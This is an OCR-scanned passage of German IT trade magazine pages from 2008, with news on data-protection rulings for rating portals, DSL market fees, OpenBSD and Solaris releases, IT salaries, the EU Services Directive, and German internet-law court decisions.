hinnehmen. Profil und Bild 
müssen jederzeit vom Nutzer 
löschbar sein, außerdem hat er 
das Recht auf Benutzung eines 
Pseudonyms in solchen Netz- 
werken. 

Rechtlich komplizierter ver- 
hält es sich bei Bewertungspor- 
talen wie spickmich.de und 
meinprof.de, das verraten die 
allgemein gehaltenen Formulie- 
rungen des zweiten Beschlus- 
ses: Hier weisen die Daten- 
schutzaufsichtsbehörden darauf 
hin, dass es sich bei den auf 
solchen Portalen allen zugäng- 
lichen Informationen um sen- 
sible Informationen und sub- 
jektive Werturteile handelt. 


Werterhalt von TK-Infrastruk- 
tur. Knauer: „Ein zu niedriges 
Bitstrom-Entgelt würde ein 
weiteres Mal die Reseller be- 
vorzugen, die kaum eigene In- 
frastruktur besitzen und ihre 
Dienste einfach Huckepack auf 
den Netzen anderer transpor- 
tieren. Das muss seinen Preis 
haben.“ 

Mit anderen Worten: An- 
ders als der Reseller United 
Internet (1&1) hoffen die Bre- 
ko-Firmen auf ein hohes Ent- 
gelt. In Hintergrundgesprä- 
chen ging es um eine Gebühr 
von 22,23 Euro, die weiterhin 
Investitionen in eigene Infra- 
struktur (Straße aufreißen und 
Kabel verlegen) rechtfertigen 
würden. Stimmen die Voraus- 
setzungen, erwartet der Ver- 
band ein Wachstum der DSL- 
Anschlusszahlen bei den 
Mitgliedern von 6,1 Mio. auf 
7,5 Mio. im laufenden Jahr. 
Derzeit stellen die Firmen etwa 
ein Drittel der rund 20 Mio. 


Betreiber müssen die Vorga- 
ben des Bundesdatenschutzge- 
setzes über die geschäftsmäßige 
Verarbeitung personenbezoge- 
ner Daten einhalten und dürfen 
nicht die freie Meinungsäuße- 
rung über das Recht auf infor- 
mationelle Selbstbestimmung 
stellen. 

Was hinter diesen im Ver- 
gleich zum ersten Beschluss 
sehr unkonkreten Formulierun- 
gen steckt, erläutert Thomas 
Petri, stellvertretender Berliner 
Beauftragter für Datenschutz 
und Informationssicherheit. Be- 
wertungsportale werden von 
vielen Datenschützern als On- 
lineauskunfteien betrachtet. Das 
bedeutet: Wenn für sie keine 
Spezialregelung gilt, ist Para- 
graf 29 des Bundesdatenschutz- 
gesetzes auf sie anzuwenden. 
Dieser legt jedoch fest, dass In- 
formationen über Personen nur 
dann zugänglich sein dürfen, 
wenn der Abrufende ein be- 
rechtigtes Interesse glaubhaft 
machen kann. Nach Ansicht der 
Berliner Datenschützer sind da- 
her solche Portale, die die Infor- 
mationen für jeden zugänglich 
machen, nicht rechtens. 

Es geht noch weiter: Nicht 
nur der Nachweis des berech- 
tigten Interesses fehlt, auch 
müsste die verantwortliche 


DSL-Anschlüsse in Deutsch- 
land. 1,1 Mrd. Euro wollen die 
Unternehmen 2008 in den wei- 
teren Netzausbau stecken und 
damit — gemessen am Markt- 
anteil — viermal so viel wie 
die Telekom. Fast drei Viertel 
(74 %) planen, das eigene 
Glasfasernetz bis an die Haus- 
halte heranzuführen („Fiber to 
the Home“). Dies sei allerdings 
nur dann sinnvoll, wenn ein 
geeigneter Weg unter Einbe- 
ziehung der jetzigen Netzstruk- 
tur mit den Telekom-Hauptver- 
teilern gefunden würde. 

Dass eigene Leitungen auch 
künftig wettbewerbsrelevant 
sind, steht für Knauer außer 
Frage. Durch langsameres Kun- 
denwachstum, steigende Mar- 
ketingkosten sowie sinkende 
Preise werde eine Marktbereini- 
gung immer wahrscheinlicher. 
Deshalb sei die schiere Band- 
breite entscheidend für Erfolg 
oder Misserfolg im DSL-Ge- 
schäft. 


Stelle - in dem Fall der Por- 
talbetreiber — diese Nachweise 
dokumentieren. Außerdem, so 
Petri, könne es nicht sein, dass 
die betroffenen Personen nicht 
informiert würden. Man könne 
schließlich nicht sämtliche Be- 
wertungsportale durchsuchen, 
ob irgendetwas dort über einen 
selbst veröffentlicht sei. Auch 
hier sind seiner Ansicht nach 
die Betreiber in der Pflicht, die 
Betroffenen zu informieren. 
Darüber hinaus haben sie dar- 
auf zu achten, dass die bewer- 
teten Personen nicht unange- 
messen beschimpft werden. 
Denn, und hier findet man sich 
wieder beim letzten Punkt des 
Beschlusses, die freie Mei- 
nungsäußerung kann keinen 
höheren Stellenwert haben als 
das Persönlichkeitsrecht des 
Bewerteten. 

Die Berliner Datenschützer 
haben es sich zur Aufgabe ge- 
macht, Portalbetreiber nach- 
drücklich auf die Erfüllung 
datenschutzrechtlicher Anforde- 
rungen hinzuweisen — notfalls 
mit Konsequenzen. Derzeit, so 
Petri, habe man gegen einen 
Portalbetreiber bereits einen 
Bußgeldbescheid verhängt. 

Ute Roos 
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PLATON von T-Systems und Microsoft soll Datenaustausch sichern 


„Platform for Orchestrated En- 
gineering Networks“ oder kurz 
PLATON heißt das von T-Sys- 
tems und Microsoft gemeinsam 
entwickelte Produkt zum siche- 
ren Datenaustausch. Kernstück 
der Software ist ein „Secure 
Data Container“ (SDC), der auf 
dem Open-Packaging-Conven- 
tion-Format des Open-XML- 
Standards beruht. 

In ihn lassen sich verschiede- 
ne Datenformate hineinkopie- 
ren, etwa Stücklistentabellen, 
3D-CAD-Modelle, Programm- 
code et cetera. Zusätzlich erhält 
jedes in einer Container-Datei 
gespeicherte Objekt eine Zu- 
griffsrechteliste für den Emp- 
fänger. Alle Elemente werden 
per IBE (Identity Based En- 
cryption) verschlüsselt. PLA- 
TON weist jedem solcherma- 
ßen gesicherten Container eine 
eindeutige Identifikationsnum- 
mer und einen Lieferschein zu. 


IBM betreibt IT 
von ProSieben$at. 1 


Unter Dach und Fach ist nach 
langem Ringen zumindest ein 
Teilverkauf der ProSieben- 
Sat.1 Produktion (PSP), einer 
Tochterfirma der ProSieben- 
Sat.l Media AG. Künftig 
wird IBM für die Fernsehsen- 
derfamilie die IT betreiben. 
Hierzu schlossen beide Fir- 
men einen Outsourcing-Ver- 
trag über zehn Jahre mit einem 
Volumen von über 200 Mio. 
Euro. Konkret übernimmt IBM 
die Verantwortung für die Pla- 
nung, den technischen Support 
sowie für die Bereitstellung 
der Anwendungen, Internet- 
technik und IT-Infrastrukturen 
für die Sendergruppe. Zudem 
soll der IT-Konzern die Kern- 
Geschäftsanwendungen, dar- 
unter Werbezeitenvermarktung, 
Programmplanung und das 
Rechtemanagement, moderni- 
sieren sowie über alle Distri- 
butionskanäle integrieren und 
verzahnen. 

Damit verknüpft ist der 
Wunsch von ProSiebenSat.l, 
künftig flexibler und schneller 
arbeiten zu können bei gleich- 
zeitiger Kostensenkung. Außer- 
dem soll eine „paneuropäische“ 
Digitalplattform einschließlich 
zentraler Playout-Zentren ent- 
stehen, eine komplett digitale, 
bandlose Infrastruktur. 
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Nach Aussagen von Microsoft 
würde bei einem Verlust eines 
Containers dessen Entschlüsse- 
lung nach heutigen Stand der 
Technik acht bis zehn Jahre 
dauern. 

Empfängerseitig benötigt der 
Anwender die PLATON-Client- 
software, einen USB-Stick mit 
seiner Signatur und einen Inter- 


netzugang. Der Client meldet 
die Ankunft einer Datensen- 
dung, authentifiziert via Rights 
Management den Empfänger 
und zeigt ihm den Lieferschein, 
also welche Inhalte der Contai- 
ner enthält. Außerdem startet er 
die für das Öffnen erforderliche 
Anwendung, gegebenenfalls mit 
den durch den Versender ein- 


geschränkten Rechten — etwa 
nur Lese- und kein Speicher- 
recht. Der Absender benutzt 
seinerseits die Clientsoftware — 
mit entsprechender Anbindung 
an ein Quellsystem —, um Zu- 
griffsrechte zu definieren so- 
wie Encryption-Keys, Ver- 
sandart und weitere Details 
festzulegen. 
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Systeme 


PAN Manager für FSCs BX600-Blades 


Als neue Umgebung für die 
zentrale Administration seiner 
Blade-Server BX600 liefert 
Fujitsu Siemens Computers 
(FSC) den PAN Manager. Er 
gehörte bisher als fester Be- 
standteil ausschließlich zu 
den in Hardware virtualisier- 
ten Bladeframe-Systemen von 
Egenera und erlaubt zudem 
die Virtualisierung auf Basis 
von Xen. Der Administrator 
kann damit sowohl physische 
als auch virtuelle Server ein- 
richten, überwachen und fern- 
steuern, Cluster sowie HAV- 
Systeme aufbauen und ein 
Disaster Recovery durchfüh- 
ren. FSC vertreibt die Blade- 
frames als OEM in EMEA 
exklusiv. 


Mit dem PAN Manager will 
FSC den Grundstein für seine 
Flexframe Infrastructure legen 
und eine Alternative zu VM- 
ware Infrastructure 3 bieten. Es 
geht vor allem darum, für die 
zentrale Administration von 
Servern eine einheitliche Sicht 
zu schaffen und so den Auf- 
wand für Schulung, Einarbei- 
tung und zusätzliche Software 
zu verringern. Egenera hatte be- 
reits im November 2007 ange- 
kündigt, den PAN Manager 
auch für zertifizierte Systeme 
anderer Hersteller anbieten zu 
wollen. Im März dieses Jahres 
hat Dell dazu eine Partnerschaft 
mit Egenera geschlossen. 
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OpenBSD 4.3 freigegeben 


Mit neuen Versionen der vor- 
wiegend klassischen Software 
geht OpenBSD 4.3 ins Rennen. 
Die Distribution gibt es zum 
freien Download als ISO-Im- 
age. Mit der neuen Version 
sind weitere Hardwarearchitek- 
turen hinzugekommen: SMP- 
Support für Sparc64, HPs PA- 
RISC im 32-Bit-Mode für die 
K-Class-Server (hppa), SMP 
auf Motorolas 881x0-Prozesso- 
ren (mvme88k) und weitere 
Treiber für SGIs Systeme mit 
Mips-CPUs wie die O2-Work- 
station. 

Über 30 neue Treiber erwei- 
tern die Unterstützung für eine 


Weitergehen: Mit Virtual- 
box 1.6 können Anwender 
nun auch virtuelle Rechner 
auf Mac OS X und Solaris 
erzeugen. Linux- und Sola- 
ris-Gäste können in einem 
Fenster auf dem Host-Desk- 
top im Seamless Windowing 
Mode laufen, was bisher 
Windows vorbehalten war 
(www .virtualbox.org/wiki/ 
Downloads). 


Speicherwerk: Zwei neue 
Entwicklungs-Tools und er- 
weiterten Service bietet Sun 
für die Speicherverwaltung 
mit OpenSolaris an. Sie hö- 
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Vielzahl teils exotischer Hard- 
warekomponenten. Bei der 
Software stehen neben einer 
großen Zahl von Tools vor al- 
lem neue Versionen von An- 
wendungen im Vordergrund, 
darunter Gnome 2.20.3, KDE 
3.5.8 sowie Xfce 4.4.2, GNU- 
step 1.14.2, Openmotif 2.3.0, 
MySQL 5.0.5la, PostgreSQL 
8.2.6 und Openoffice 2.3.1. 

Wie bisher kann man 
OpenBSD 4.3 auf CD bestel- 
len, womit das Projekt ver- 
sucht, einen Teil seiner Kosten 
zu decken. 
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ren auf die sperrigen Namen 
„Build an OpenSolaris sto- 
rage server in 10 minutes or 
less“ und „Simple Steps to 
building aNAS appliance“. 
Die Sammlung gibt es unter 
www.sun.com/openstorage. 


Rundendrehen: Unter Open- 
Powerlink hat die SYS TEC 
electronic (Greiz) ihren Soft- 
ware-Stack für Ethernet 
Powerlink als Open Source 
(BSD-Lizenz) herausgegeben, 
der Software für den Manage- 
und die Controller-Nodes ent- 
hält. Mit handelsüblichen On- 
board-Controllern unter Linux 
(ab Kernel 2.6.23) sollen da- 
mit Zykluszeiten bis herab zu 
0,5 ms zu erzielen sein (www. 
ethernet-powerlink.org). 


Solaris 10 5/08 und OpenSolaris frei 


Mit der Version 5/08 von So- 
laris 10 hat Sun Microsystems 
den Nachfolger der Version 
vom August 2007 (8/07) per 
Download frei zur Verfügung 
gestellt (www .sun.com/software 
/solaris/get.jsp). Wenige Tage 
später, zur jährlich stattfin- 
denden Entwickler-Konferenz 
CommunityOne, folgte die Be- 
reitstellung einer Live-CD von 
OpenSolaris 2008.5 (Indiana) 
auf opensolaris.org. Solaris 10 
5/08 gibt es als Image-Datei für 
eine DVD oder sechs CDs auf 
der Site von Sun zum kosten- 
losen Download. Alternativ bie- 
tet Sun Media-Kits für 35 US-$ 
an. Bei dem CD-Set gibt es eine 
Sparc- und eine x86-Version. 
Die Kits enthalten neben der 
Entwicklungsumgebung Stu- 
dio 12, HPC Clustertools 7.1 
und Netbeans IDE 6.0.1 eine 
Sammlung zusätzlicher Soft- 
ware, die Solaris Software 
Companion. 

Sun setzt als Mindestanfor- 
derungen 2 GByte Platz auf 
der Festplatte sowie 128 
MByte, für x86er 256 MByte 
RAM voraus. Außer auf Suns 
eigenen UltraSparc und FSCs 
Sparc64 läuft Solaris 10 auf 
den Prozessoren von AMD, 
Intel und VIA, sowohl in der 
32-, als auch in der 64-Bit- 
Variante. 

Zu den Neuerungen zählen 
vor allem: 

— die Behandlung von Spei- 
cherfehlern nun auch für Xe- 
on-, AMD64-, UltraSparc-TI- 
und -T2-CPUs, 

— Suns StorEdge Traffic Mana- 
ger zur Datenverwaltung, 

- Solaris Live Upgrade für 
Container, 

— das Internet Printing Protocol 
(IPP) auf der Client-Seite, die 
Open Printing API (PAPD) so- 
wie VNC-Client und -Server, 
- Suns Validation Test Suite 
(SunVTS), 


— Unterstützung für Ultra- 
SPARC T2 Shared Contexts, 
Intels CPUID, Intels MONI- 
TOR/MWAIT, Infiniband und 
die Memory Placement Opti- 
mization (MPO), 

— UltraSparc T2 ECC Accele- 
ration und Solaris Trusted Ex- 
tensions, 

— Powermanagement für die 
64-Bit-CPUs von Intel und 
AMD, 

-Flash Player, der Instant 
Messenger Pidgin, Locale Crea- 
tor sowie die Eingabemöglich- 
keit von traditionellen chinesi- 
schen Zeichen und 

- das Aufteilen der CPU- 
Ressourcen in sogenannte CPU- 
Caps bei der Virtualisierung. 

OpenSolaris kommt mit einer 
CD aus, das ISO-Image ist 686 
MByte groß. Außerdem kann 
man die Life-CD kostenfrei bei 
Sun bestellen. Es handelt sich 
um ein vollwertiges Desktop- 
Betriebssystem für x86-Archi- 
tekturen, das einige Kernfea- 
tures von SolarislO enthält, 
unter anderem das Zettabyte 
File System (ZFS), die Service 
Management Facility (SMF) so- 
wie den System-Tracer Dtrace. 
Sun will damit vor allem Linux- 
Anwender für Solaris gewinnen, 
die sich mit der Gnome-Ober- 
fläche in einer vertrauten Umge- 
bung wiederfinden. Außerdem 
sind eine ganze Reihe unter Li- 
nux üblicher Anwendungen 
dabei. Das OpenSolaris-Projekt 
leitet Ian Murdock, der die De- 
bian-Distribution aus der Taufe 
hob und nun seit über einem 
Jahr für Sun arbeitet. 

Bei der Free Solaris Express 
Developer Edition (SXDE), 
die auf der Site developers. 
sun.com/sxde/ bereitsteht, han- 
delt es sich um den jeweils 
neuesten Build aus den Open- 
Source-Quellen von Solaris. 


Eix-ink ix0806038 


Überwachung für VMs von Vizioncore 


Mit vCharter Pro will Vizion- 
core seinen Kunden ein Ma- 
nagement-System anbieten, 
mit denen sie virtuelle Infra- 
strukturen ganzer Unterneh- 
men überwachen und verwal- 
ten können. 

Das System erlaubt es, die 
Sicht in unterschiedlichen 
Ebenen aufzufächern. So kön- 
nen die Administratoren eine 


Aufteilung von großen Berei- 
chen wie dem Rechenzentrum, 
ESX-Clustern, Ressourcen- 
Pools, gemeinsam genutzte 
Speicherbereiche bis hinunter 
zu einzelnen virtuellen Ma- 
schinen vornehmen. Dabei las- 
sen sich die Ressourcen wie 
CPU, Memory, Disks oder 
NICs festlegen und zeitlich er- 
fassen. 
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Beruf 


Einstiegsgehälter 


Im Zuge der Umstellung auf 
internationale Hochschulab- 
schlüsse Bachelor und Master 
bleibt das Gehaltsniveau der 
Studienabsolventen in Deutsch- 
land konstant. Durchschnittlich 
verdient ein Bachelor-Absolvent 
39 000 €. Das Gehalt eines 
Masters liegt um 3000 € höher. 
Die vergleichende Analyse 
aktueller Kienbaum-Vergütungs- 
studien zeigt, dass der Master 
analog dem Universitätsab- 
schluss und der Bachelor analog 
dem Fachhochschulabschluss 
vergütet wird. Der Untersu- 
chung zufolge schwanden zu- 
dem die Vergütungsunterschie- 
de zwischen Universitäts- und 
Fachhochschulabsolventen in 
den vergangenen Jahren. Das 
Einstiegsgehalt eines Ingenieurs 
mit Fachhochschulabschluss 
beträgt heute durchschnittlich 
41 000 € im Jahr. Für einen 
Universitätsabschluss erhält 
man lediglich 2000 € mehr. 
Vor vier Jahren betrug der 
Unterschied noch 3000 €. 


Gefragt: SAP-Experten 
bleiben die gefragten Spezi- 
alisten unter den IT-Freibe- 
ruflern. Im letzten Jahr er- 
hielten sie über 32 000 
Projektofferten über das 
Gulp-Portal. Die erhöhte 
Nachfrage schlug sich in 
den Stundensatzforderun- 
gen nieder. Zu Jahresbeginn 
forderten externe SAP-Pro- 
fis einen durchschnittlichen 
Stundensatz von 81 €. Die- 
ser Wert stieg im Jahresver- 
lauf auf gegenwärtig 84 € 
pro Stunde. 


Mangel: Laut einer Bit- 
kom-Umfrage beabsichtigen 
57 % der ITK-Firmen — vor- 
nehmlich Softwarehäuser 
und IT-Dienstleister —- im 
laufenden Jahr zusätzliche 
Mitarbeiter einzustellen. 
Nur jedes elfte Unterneh- 
men will Stellen streichen. 
65 % der Unternehmen ga- 
ben zudem an, dass der 
Mangel an IT-Experten ihre 
Geschäfte bremst. Jedes 
vierte Unternehmen muss 
Aufträge ablehnen, weil 
Mitarbeiter fehlen. 
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Stellenanzeigen: Wissen gegen Erfahrung 


Deutsche IT-Unternehmen be- 
setzen offene Stellen für Pro- 
grammierer bevorzugt mit 
Hochschulabsolventen. Rund 
30% der Stellenanzeigen betref- 
fen Berufseinsteiger und Nach- 
wuchsentwickler, nur halb so 
viele (14%) Jobausschreibungen 
richten sich an gestandene An- 
wendungsentwickler, die bereits 


längere Zeit im Berufsleben ste- 
hen. Im Stellenmarkt für IT-Ar- 
chitekten suchen Personalchefs 
dagegen deutlich öfter erfahre- 
ne IT-Profis als Berufseinstei- 
ger. Von den Stellenangeboten 
für Berufserfahrene richten sich 
13% an Spezialisten im Aufbau 
von IT-Architekturen. Absol- 
venten werden dagegen in die- 


sem Einsatzgebiet mit unter 5% 
erheblich weniger gesucht. Ver- 
gleichbares gilt für das Projekt- 
management. Auch hier sucht 
man IT-Experten mit Berufser- 
fahrung (9,8 %) deutlich häufi- 
ger als Berufseinsteiger (2,7 %). 
Zu diesen Ergebnissen gelangt 
die Studie „IT Jobscout 2008“ 
der PPI AG. 
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Recht 


Verwaltungsvorgänge beschleunigen 


Dienstlich 


Tobias Haar 


Den Traum vom One-Stop-Government soll die 
EU-Dienstleistungsrichtlinie einen entscheidenden 
Schritt voranbringen. Ziel sind stark auf IT gestützte 
durchgängige und medienbruchfreie Verwaltungs- 
prozesse in der EU. Gut vorbereitete IT-Dienstleister 
dürfen auf volle Auftragsbücher hoffen. 


1») ie EU-Dienstleistungsrichtli- 
nie soll die grenzüberschrei- 
tende Erbringung von Dienst- 
leistungen innerhalb der EU und 
damit den einheitlichen Binnen- 
markt fördern. Sie soll die Zu- 
lassung zur Dienstleistung in 
einem anderen EU-Land er- 
leichtern. Die Intention ist, 
Dienstleister aus anderen Län- 
dern in die Lage zu versetzen, 
sich über die entsprechenden 
Zulassungsregelungen aus der 
Ferne informieren sowie Anträ- 
ge von dort aus stellen und Be- 
scheide empfangen zu können. 

Auf Verwaltungsebene soll 
es eine verbesserte Zusammen- 
arbeit der europäischen Ver- 
waltungen geben. Schließlich 
sollen einheitliche Qualitäts- 
standards und Verhaltenskodi- 
zes für Dienstleistungserbrin- 
ger geschaffen werden. 

Die Richtlinie müssen die 
einzelnen EU-Staaten bis Ende 
2009 umsetzen. Sie gilt grund- 
sätzlich für alle „im Wirtschafts- 
verkehr gehandelten Dienstleis- 


tungen“. Ausgenommen sind 
nur besonders geregelte oder 
sensible Bereiche, etwa Gesund- 
heitsleistungen, die elektroni- 
sche Kommunikation, private 
Sicherheitsdienste, Arbeitsrecht 
et cetera. Obwohl die Richtlinie 
bereits von 2006 ist, kommt 
durch die knappe verbleibende 
Zeit derzeit deutlich Bewegung 
in ihre Umsetzung. 


Zwang zu 
E-Government 


In der Richtlinie setzt die EU 
massiv auf die IT-Unterstützung 
entsprechender Prozesse. Alle 
Verfahren und Formalitäten sol- 
len mittels IT abgewickelt und 
die zuständigen Behörden über 
sie verbunden werden. Dazu 
gilt es, EU-weit Prozesse und 
Schnittstellen zu definieren. Ge- 
rade die Herausforderung, Ver- 
waltungshandeln an Prozessen 
und nicht an Aufgaben zu orien- 
tieren, muss zu einem erheb- 


Deutschland- 
Online 


Bis Mitte dieses Jahres sollen die Projektbeteiligten von 
„Deutschland-Online” Pläne für die IT-Umsetzung der 
europaweiten E-Government-Vorgaben erarbeiten. 
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lichen Mentalitätswandel in der 
öffentlichen Verwaltung führen. 
Gleichzeitig müssen Interope- 
rabilität, Datenschutz und Si- 
cherheit gewährleistet sein, 
um einerseits Medienbrüche 
zu vermeiden und andererseits 
die Integrität der Prozesse im 
Einklang mit sonstigem gelten- 
den Recht zu verwirklichen. 
Ohne IT-Dienstleister aus der 
Privatwirtschaft wird die Um- 
setzung nicht gelingen. 

Interessant ist die Richtlinie 
aus IT-rechtlicher Sicht insbe- 
sondere, weil sie zum ersten 
Mal einen „rechtlichen Zwang 
zur Realisierung von E-Go- 
vernment-Anwendungen“ fest- 
schreibt. In Deutschland werden 
diese Aspekte der Richtlinie nun 
unter der Federführung der Län- 
der Baden-Württemberg und 
Schleswig-Holstein umgesetzt. 
Das entsprechende Projekt trägt 
den Namen „Deutschland-On- 
line“. Bis Mitte 2008 sollen 
Blaupausen für die IT-Umset- 
zung in den Ländern vorliegen, 
die die Behörden anschließend 
erproben. Im Ergebnis soll 
dies zur Definition der infra- 
strukturellen Anforderungen in 
Deutschland im europaweiten 
Kontext führen. 

Daneben gilt es, die IT-Ar- 
chitektur und die medienbruch- 
freie Verfahrensabwicklung zu 
entwickeln. Schließlich sollen 
die Verantwortlichen techni- 
sche Standards für Schnittstel- 
len vorschlagen sowie die recht- 
lichen und organisatorischen 
Anforderungen einer elektroni- 
schen Verfahrensabwicklung 
zeigen. Bei alldem ist darauf 
zu achten, dass im föderalen 
Deutschland nicht entlang der 
Grenzen der Bundesländer In- 
sellösungen entstehen. 

Bei der Umsetzung sind 
gerade die IT-spezifischen Re- 
gelungen der Richtlinie von be- 
sonderem Interesse. Die lassen 
sich wiederum in Regelungen 
des Verhältnisses zwischen 
Bürgern oder Unternehmen 
und Staat (Consumer-to-Go- 
vernment, C2G, Business-to- 
Government, B2G) sowie der 
EU-Staaten untereinander (Go- 
vernment-to-Government, G2G) 
unterteilen. Im B2G-Verhält- 
nis geht es um ein elektroni- 
sches Antragsverfahren über 
einen einheitlichen nationalen 
Ansprechpartner oder die zu- 
ständige Behörde. 

Daneben sollen Dienstleis- 
tungsempfänger — also Kun- 
den - sowie der Dienstleister 


selbst Informationen zum eige- 
nen wie zum ausländischen 
Recht bei dem für ihn zustän- 
digen „einheitlichen Ansprech- 
partner“ erhalten. Gerade das 
setzt eine intensive Vernetzung 
aller betroffenen Stellen im In- 
und Ausland voraus. 


Informationen 
via IT austauschen 


Im G2G-Verhältnis geht es ins- 
besondere um den Aufbau eines 
„Systems europäischer Amts- 
hilfe“. Behörden müssen EU- 
weit vernetzt sein, um miteinan- 
der kommunizieren zu können. 
Geplant sind überdies der 
gegenseitige Registerabruf so- 
wie die Erreichbarkeit von Be- 
schwerdestellen. Hier geht es 
etwa um die Überprüfung der 
Angaben ausländischer Dienst- 
leister und um die Überwa- 
chung der Tätigkeiten deutscher 
Dienstleister im Ausland. Dies 
soll im Wesentlichen das soge- 
nannte „Binnenmarkt-Informa- 
tionssystem IMI“ ermöglichen. 
Die Umsetzung der EU- 
Dienstleistungsrichtlinie könn- 
te sich zu einem Motor für die 
IT-Branche in Deutschland 
und anderen EU-Staaten entwi- 
ckeln. Laut der Studie Bran- 
chenkompass Public Services 
2007 von Steria Mummert 
Consulting planen etwa 30 % 
aller deutschen Kommunen, 
den Aufbau, den Betrieb und 
die Wartung der erforderlichen 
E-Government-Portale auszu- 
schreiben. 20 % der Behörden 
erwägen offenbar eine voll- 
ständige Auslagerung ihrer IT 
zu externen Dienstleistern. 
Die Umsetzung der EU- 
Dienstleistungsrichtlinie eröff- 
net IT-Unternehmen nicht nur 
die Möglichkeit, ihre Leistun- 
gen in anderen EU-Ländern 
einfacher und effizienter zu 
vermarkten, sondern gerade 
auch die IT-Umsetzung auf et- 
wa kommunaler Ebene mitzu- 
gestalten und letztlich auch 
daran mitzuverdienen. Dazu 
werden in den kommenden 
Monaten die Weichen gestellt. 
Die mit der Umsetzung befass- 
ten Juristen sehen sich im Be- 
reich des Verwaltungsrechts 
mit der Aufgabe konfrontiert, 
teils jahrzehntealte Vorschrif- 
ten so anzupassen, dass IT-In- 
frastrukturen sie abbilden kön- 
nen. Aber genau das bezweckt 
die Richtlinie: Es soll kein Stein 
auf dem anderen bleiben. (ur) 
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MARKT + TRENDS 


Recht 


Frequenzen für Breitband- 
dienste: Die Bundesnetz- 
agentur hat bundesweit das 
bisher größte Funkfrequenz- 
spektrum für breitbandige 
Anwendungen zur Verfü- 
gung gestellt. Neuen Anbie- 
tern soll damit und durch 
Technik- sowie Dienste- 
neutralität der Marktzugang 
ermöglicht werden. 


Tastendruck-Abzocke: Das 
Verwaltungsgericht Köln hat 
eine Weiterleitung per Tas- 
tendruck auf eine kosten- 
pflichtige Mehrwertdienste- 
Rufnummer für unzulässig 
erklärt, da dies gleich gegen 
mehrere Gesetze verstößt. 
Damit wurde eine Verbots- 
entscheidung der Bundesnetz- 
agentur gerichtlich bestätigt. 


Löschungspflicht für 
Unterseiten: Hat ein Gericht 
die Nutzung einer Internet- 
Domain untersagt, genügt ei- 
ne Entfernung der Startseite 
nicht. Es müssen auch alle 
Unterseiten gelöscht werden, 
sonst drohen Bußgelder, hat 
das Landgericht Düsseldorf 
entschieden. 


Sub-loop Unbundling in 
der Schweiz: Die Schweizer 
Kommunikationskommission 
hat der Swisscom aufgege- 


ben, bis Juli 2008 ein Ange- 
bot zum Sub-loop Unbund- 
ling vorzulegen. Damit soll 
auch die letzte „halbe Mei- 
le“, die Leitung vom Vertei- 
lerkasten zum Hausan- 
schluss, für Konkurrenten 
zugänglich werden. 


Internet-Sperrungsver- 
fügungen: Die medienwirk- 
same Anordnung der Sper- 
rung von Internetseiten durch 
die Düsseldorfer Bezirks- 
regierung im Jahr 2002 war 
rechtswidrig. Dies hat nun 
ein Rechtsgutachten ergeben. 
Diesem zufolge fehlt es für 
derlei Maßnahmen an gesetz- 
lichen Rechtsgrundlagen. 


Impressumspflicht: Die Im- 
pressumspflicht nach dem 
Telemediengesetz gilt auch 
dann für gewerbliche Inter- 
net-Inhalte, wenn diese Web- 
seiten über fremde Server 
(Host Provider) ins Internet 
gelangen. Das belegt ein neu- 
es Urteil des Oberlandesge- 
richts Düsseldorf. 


Keine Fax-Pflicht für Unter- 
nehmer: Das Oberlandes- 
gericht Hamburg hat die lang 
umstrittene Frage entschieden, 
ob Unternehmer im Fernab- 
satz für den Widerruf des Ver- 
trages durch einen Verbrau- 
cher ein Telefax vorhalten und 
die Nummer angeben müssen. 
Die hanseatischen Richter 
haben das nun verneint. 


Nutzungsverbot betrifft auch Subdomains 


Vor einiger Zeit wurde Goo- 
gle die Nutzung des E-Mail- 
Dienstes unter „gmail.com“ 
in Deutschland verboten. Ein 
entsprechendes Urteil erstritt 
der Inhaber der Webseite 
„gmail.de“, der auch die zu- 
gehörige Wortmarke besitzt. 
Das Oberlandesgericht Ham- 
burg (Az. 5 W 102/07) ver- 
hängte nun ein Bußgeld, weil 
Google unter einer Subdomain 


(m.gmail.com) ein Forwar- 
ding eingerichtet hatte. Damit 
wurde der unter gmail.com 
eingehende E-Mail-Verkehr 
auf eine andere Domain um- 
geleitet. Die Verwendung der 
Subdomain ist nach Auffas- 
sung der Richter aber ebenso 
als Markenverletzung anzuse- 
hen. Das Gleiche dürfte auch 
beim „Redirecting“ gelten. 
Tobias Haar 


Verbraucherschutz bei gewerblichem Verkauf 


Das Widerrufsrecht im Fern- 
absatz steht nur Verbrauchern, 
nicht aber gewerblichen Kun- 
den zu. Das Oberlandesgericht 
Hamm (Urteil vom 28.02. 
2008, Az.: 4 U 197/07) hat nun 
entschieden, dass dieser Grund- 
satz auch dann gilt, wenn ein 
gewerblicher Anbieter auf 
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Ebay defekte Hardware zum 
Ausschlachten anbietet, ob- 
wohl dessen AGB einen Ver- 
kauf „ausschließlich an Gewer- 
betreibende“ vorsehen. Für die 
Richter kann der AGB-Hin- 
weis zu leicht übersehen wer- 
den, um wirksam zu sein. 

Tobias Haar 


Usenet-Betreiber haften doch 


Bislang haben die meisten 
deutschen Gerichte eine Haf- 
tung von Usenet-Betreibern 
für Rechtsverletzungen der 
über sie abrufbaren Inhalte ab- 
gelehnt. Nicht so das Land- 
gericht Hamburg in gleich 
mehreren Entscheidungen. Da 
Anbieter „recht offensichtlich 
mit Urheberrechtsverletzun- 
gen per AdWords warben“, 
hatte Google diese aus seinem 
Werbeprogramm ausgeschlos- 


sen. Die dagegen gerichteten 
Klagen wies das Gericht mit 
der Begründung ab, der Be- 
klagten Google nicht zumuten 
zu können, „mit in die Haf- 
tung genommen zu werden, 
wenn sie Werbung von sol- 
chen Providern“ ermöglichen 
muss. Damit haben die Rich- 
ter erkennen lassen, dass sie 
auch eine Haftung nur des 
Werbeanbieters für möglich 
halten. Tobias Haar 


Haftung für Affiliate-Vertriebspartner 


Werden bei einem Internet- 
Vertriebssystem Produkte über 
Affiliates vertrieben, haftet der 
Verkäufer auch für Wett- 
bewerbsverstöße seiner Ver- 
triebspartner. Das gilt selbst 
dann, wenn sich die Vertriebs- 
partner vertraglich zur Einhal- 
tung der geltenden Gesetze 
verpflichtet haben. Mit dieser 
Begründung urteilte das Ober- 
landesgericht Köln (Az. 6 U 
149/07) im Fall einer Affiliate- 
Webseite, die gegen lebens- 
mittelrechtliche Vorschriften 


verstoßen hatte. Die Richter 
waren der Meinung, dass es 
sich bei Affiliates um „Mitar- 
beiter“ oder „Beauftragte“ im 
Sinne des Gesetzes gegen den 
unlauteren Wettbewerb han- 
delt. Deren Fehlverhalten muss 
sich der „Merchant“ also zu- 
rechnen lassen. Alle Betreiber 
solcher Vertriebssysteme soll- 
